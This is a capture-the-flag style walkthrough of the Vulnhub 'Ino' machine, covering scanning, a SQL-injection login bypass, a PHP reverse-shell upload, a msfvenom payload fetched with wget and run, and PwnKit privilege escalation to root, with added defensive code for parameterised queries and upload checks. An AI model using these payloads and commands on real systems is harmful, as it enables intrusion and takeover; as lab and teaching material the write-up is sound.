Vulnhub Ino machine: detailed test walkthrough (a completely different way of getting a shell and escalating privileges locally)


Ino

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:86:38:75      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.253  08:00:27:f5:7e:8f      1      60  PCS Systemtechnik GmbH       

The netdiscover tool on Kali Linux identifies the target host's IP address as 192.168.56.253. (192.168.56.1 is the host-only adapter on the host machine and 192.168.56.100 is the VirtualBox DHCP server for that network, so neither is the target.)

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.253 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-16 00:34 EDT
Nmap scan report for localhost (192.168.56.253)
Host is up (0.00034s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 deb52389bb9fd41ab50453d0b75cb03f (RSA)
|   256 160914eab9fa17e945395e3bb4fd110a (ECDSA)
|_  256 9f665e71b9125ded705a4f5a8d0d65d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:F5:7E:8F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.84 seconds

The NMAP scan shows two open ports on the target: 22 (ssh) and 80 (http). The banners (OpenSSH 7.9p1 Debian 10+deb10u2, Apache 2.4.38 Debian) identify the operating system as Debian 10 (buster).

Getting a shell

Browsing port 80, the returned page shows that the CMS is Lot Reservation Management System. searchsploit knows two issues for version 1.0:

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ searchsploit Lot Reservation
-------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                              |  Path
-------------------------------------------------------------------------------------------- ---------------------------------
Lot Reservation Management System 1.0 - Authentication Bypass                               | php/webapps/48934.txt
Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)                       | php/webapps/48935.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

The installed version is not known yet, so first check whether there are other directories worth looking at.

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ nikto -h http://192.168.56.253
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.253
+ Target Hostname:    192.168.56.253
+ Target Port:        80
+ Start Time:         2023-04-16 00:40:09 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: /lot/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
+ Scan terminated:  20 error(s) and 3 item(s) reported on remote host
+ End Time:           2023-04-16 00:41:00 (GMT-4) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 

The root page redirects to the /lot directory. Nikto also hit its error limit (20 failed connections) and gave up, so its output above is incomplete.

Gobuster could not enumerate the directory either, because port 80 was refusing connections at that moment:

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ gobuster dir -u http://192.168.56.253/lot/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.253/lot/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,html,js,sh,txt
[+] Timeout:                 10s
===============================================================
2023/04/16 00:46:35 Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://192.168.56.253/lot/: Get "http://192.168.56.253/lot/": dial tcp 192.168.56.253:80: connect: connection refused

The service was reachable again later, but with nothing else to go on, pull the authentication-bypass exploit from searchsploit and read it:

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ searchsploit -m php/webapps/48934.txt
  Exploit: Lot Reservation Management System 1.0 - Authentication Bypass
      URL: https://www.exploit-db.com/exploits/48934
     Path: /usr/share/exploitdb/exploits/php/webapps/48934.txt
    Codes: N/A
 Verified: True
File Type: ASCII text
Copied to: /home/kali/Vulnhub/Ino/48934.txt


                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ cat 48934.txt 
#Exploit Title: lot reservation management system 1.0 - Authentication Bypass
#Date: 2020-10-22
#Exploit Author: Ankita Pal
#Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip
#Version: V1.0
#Tested on: Windows 10 + xampp v3.2.4


Proof of Concept:::

Step 1: Open the URL http://localhost:8081/lot-reservation-management-system/admin/login.php

Step 2: use payload ' or 1=1 limit 1 -- -+ for both username and password.


Malicious Request:::

POST /lot-reservation-management-system/admin/ajax.php?action=login HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 71
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/lot-reservation-management-system/admin/login.php
Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id

username='+or+1%3D1+limit+1+--+-%2B&password='+or+1%3D1+limit+1+--+-%2B

You will be login as admin of the application.      

Use the bypass payload on the admin login page:

http://192.168.56.253/lot/admin/

Username: admin' or 1=1 --

Password: admin' or 1=1 --

This gets past the admin login. The login handler evidently builds its query by concatenating the submitted username and password into the SQL string: the single quote closes the string literal, or 1=1 makes the WHERE clause true for every row, and -- comments out the remainder of the statement, so the first row of the users table (the admin account) is accepted. Make sure a space follows the --: MySQL only treats -- as a comment when it is followed by whitespace, which is also why the exploit-db payload ends in "-- -+".
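To make the mechanism concrete, here is an added example (not code from the original walkthrough and not the Lot Reservation Management System source): a login check written the way the bypassed one evidently behaves, next to the parameterised version that closes the hole. The users table, its rows and the plaintext passwords are constructed sample data and stand in for the real application's MySQL schema, which is not shown on this page.

```python
"""
Added example: string-built login query versus bound parameters, run against
an in-memory SQLite stand-in for the application's MySQL backend.
Table layout and rows are constructed sample data (assumptions).
"""
import sqlite3


def build_db():
    """In-memory SQLite database with a constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "S3cretAdm1n"), (2, "ppp", "lotuser")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Interpolates user input straight into the statement, as the bypassed
    login evidently does. Returns the matched username, or None."""
    sql = (
        "SELECT id, username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    row = conn.execute(sql).fetchone()  # first row wins, as in the app
    return row[1] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters: the quote and the -- stay data."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[1] if row else None


# The two payloads that appear on this page: the walkthrough's and exploit-db 48934's.
PAYLOADS = ["admin' or 1=1 -- ", "' or 1=1 limit 1 -- -+"]

if __name__ == "__main__":
    db = build_db()
    for p in PAYLOADS:
        print(repr(p),
              "vulnerable ->", login_vulnerable(db, p, p),
              "| safe ->", login_safe(db, p, p))
```

SQLite treats -- as a line comment just as MySQL does, so in the vulnerable function the WHERE clause collapses to username = 'admin' or 1=1 and the first row, the administrator, comes back; the "limit 1" in the exploit-db payload merely pins that down explicitly. The bound-parameter version receives the whole payload as a string literal, matches nothing and returns None. A real login must also compare password hashes rather than plaintext, which this illustration leaves out.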

Under System Settings the application offers a file upload, and it accepted shell.php (a PHP reverse shell pointing at Kali, 192.168.56.206, port 5555) without objection. Start the listener on Kali first; once the uploaded file is requested, Apache executes it and the target connects back.

The shell arrives on Kali as www-data:

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.253] 40798
Linux ino 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64 GNU/Linux
 05:59:36 up 26 min,  0 users,  load average: 0.00, 0.21, 0.60
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@ino:/$ cd /home
cd /home
www-data@ino:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root root 4.0K Oct 10  2020 .
drwxr-xr-x 18 root root 4.0K Oct 27  2020 ..
drwxr-xr-x  2 ppp  ppp  4.0K Dec  5  2020 ppp
www-data@ino:/home$ cd ppp
cd ppp
www-data@ino:/home/ppp$ ls -alh
ls -alh
total 24K
drwxr-xr-x 2 ppp  ppp  4.0K Dec  5  2020 .
drwxr-xr-x 3 root root 4.0K Oct 10  2020 ..
lrwxrwxrwx 1 root root    9 Dec  5  2020 .bash_history -> /dev/null
-rw-r--r-- 1 ppp  ppp   220 Oct 10  2020 .bash_logout
-rw-r--r-- 1 ppp  ppp  3.5K Oct 10  2020 .bashrc
-rw-r--r-- 1 ppp  ppp   807 Oct 10  2020 .profile
-rw-r--r-- 1 ppp  ppp    33 Dec  5  2020 local.txt
www-data@ino:/home/ppp$ cat local.txt
cat local.txt
f29cea45f473ebfa834885c4ff70ec1a

That gives the user flag.
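The foothold came from an upload form that stored shell.php as submitted. As an added example (not code from the walkthrough or from the Lot Reservation Management System), here is the kind of gate that form needed in front of whatever writes the file into the web root. The image allow-list, the magic bytes and the sample uploads are assumptions and constructed data.

```python
"""
Added example: allow-list upload check that refuses shell.php, double
extensions, dotfiles such as .htaccess, path components and image files
carrying PHP tags. Allow-list and samples are assumptions.
"""
import os
import secrets

# Allowed extensions mapped to the leading bytes a genuine file must carry.
IMAGE_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def check_upload(filename, content):
    """Return (accepted, reason). Every rule is an allow-list: anything that
    is not demonstrably a plain image is refused."""
    name = os.path.basename(filename)
    if name != filename or "\\" in name or name in ("", ".", ".."):
        return False, "path separators not allowed"
    stem, dot, ext = name.lower().rpartition(".")
    if not dot or not stem or "." in stem:
        # Covers "shell.php.png", ".htaccess" and names with no extension.
        return False, "exactly one extension required"
    magic = IMAGE_MAGIC.get("." + ext)
    if magic is None:
        return False, "extension not allowed"
    if not content.startswith(magic):
        return False, "content does not match extension"
    if b"<?php" in content or b"<?=" in content:
        # Defence in depth against image/PHP polyglots.
        return False, "embedded PHP tag"
    return True, "ok"


def stored_name(filename):
    """Never reuse the client's name: random stem plus the checked extension.
    Call only after check_upload() accepted the file."""
    ext = filename.lower().rpartition(".")[2]
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    samples = {  # constructed uploads
        "shell.php": b"<?php phpinfo(); ?>",
        "shell.php.png": IMAGE_MAGIC[".png"] + b"\x00" * 16,
        "logo.png": IMAGE_MAGIC[".png"] + b"\x00" * 16,
    }
    for fname, data in samples.items():
        ok, why = check_upload(fname, data)
        print(fname, "->", ok, why, "->", stored_name(fname) if ok else "-")
```

The check refuses by default and only lets a file through when its single extension is on the list and the first bytes agree with it; renaming the stored file removes the attacker's control over the name the web server sees. Serving uploads from a directory where PHP execution is disabled is the other half of the fix and is a web-server setting rather than application code.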

Privilege escalation

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.206 LPORT=6666 -f elf -o escalate.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: escalate.elf
                                                                                                                              
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ python -m http.server   
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...


Generate the payload with msfvenom and serve it from Kali with python -m http.server (port 8000), then fetch escalate.elf into /tmp on the target. The target is x86_64 (see the uname output above); a linux/x86 payload still runs because the Debian amd64 kernel executes 32-bit ELF binaries, but linux/x64/meterpreter/reverse_tcp would match the host natively.

www-data@ino:/tmp$ wget http://192.168.56.206:8000/escalate.elf
wget http://192.168.56.206:8000/escalate.elf
--2023-04-16 06:06:32--  http://192.168.56.206:8000/escalate.elf
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: 'escalate.elf'

escalate.elf        100%[===================>]     207  --.-KB/s    in 0s      

2023-04-16 06:06:32 (65.6 MB/s) - 'escalate.elf' saved [207/207]

www-data@ino:/tmp$ chmod +x escalate.elf
chmod +x escalate.elf

Start the handler on Kali Linux:

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run

Run ./escalate.elf in the target's shell.

This gives a meterpreter session:

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.206:6666 
[*] Sending stage (1017704 bytes) to 192.168.56.253
[*] Meterpreter session 1 opened (192.168.56.206:6666 -> 192.168.56.253:44636) at 2023-04-16 01:07:39 -0400

meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester

Use local_exploit_suggester to find exploit modules usable for privilege escalation (select post/multi/recon/local_exploit_suggester, set SESSION to 1 and run it):

[*] 192.168.56.253 - Valid modules for session 1:
============================

 #   Name                                                               Potentially Vulnerable?  Check Result
 -   ----                                                               -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                Yes                      The target is vulnerable.
 2   exploit/linux/local/pkexec                                         Yes                      The service is running, but could not be validated.                                                                                                        
 3   exploit/linux/local/su_login                                       Yes                      The target appears to be vulnerable.                                                         

Use the first module, exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec, with SESSION set to 1, to escalate. This is PwnKit, CVE-2021-4034 in polkit's SUID pkexec, disclosed in January 2022; the machine dates from 2020 (kernel 4.19.0-11-amd64, built 2020-09-17) and was never patched, which is why this route works and why it is presumably not the intended one. On a real host the fix is to update policykit-1, or as a stopgap remove the SUID bit from /usr/bin/pkexec. Drop to a shell in the resulting session and we are root:

meterpreter > shell
Process 1409 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls -alh
total 28K
drwx------  3 root root 4.0K Dec  5  2020 .
drwxr-xr-x 18 root root 4.0K Oct 27  2020 ..
lrwxrwxrwx  1 root root    9 Dec  5  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-------  1 root root 3.5K Oct 26  2020 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4.0K Oct 27  2020 .ssh
-rw-------  1 root root   33 Dec  5  2020 proof.txt
cat proof.txt
21bae0a12690199cde7a65bff57723a5

That gives the root shell and the root flag.

Source: https://www.toymoban.com/news/detail-415290.html


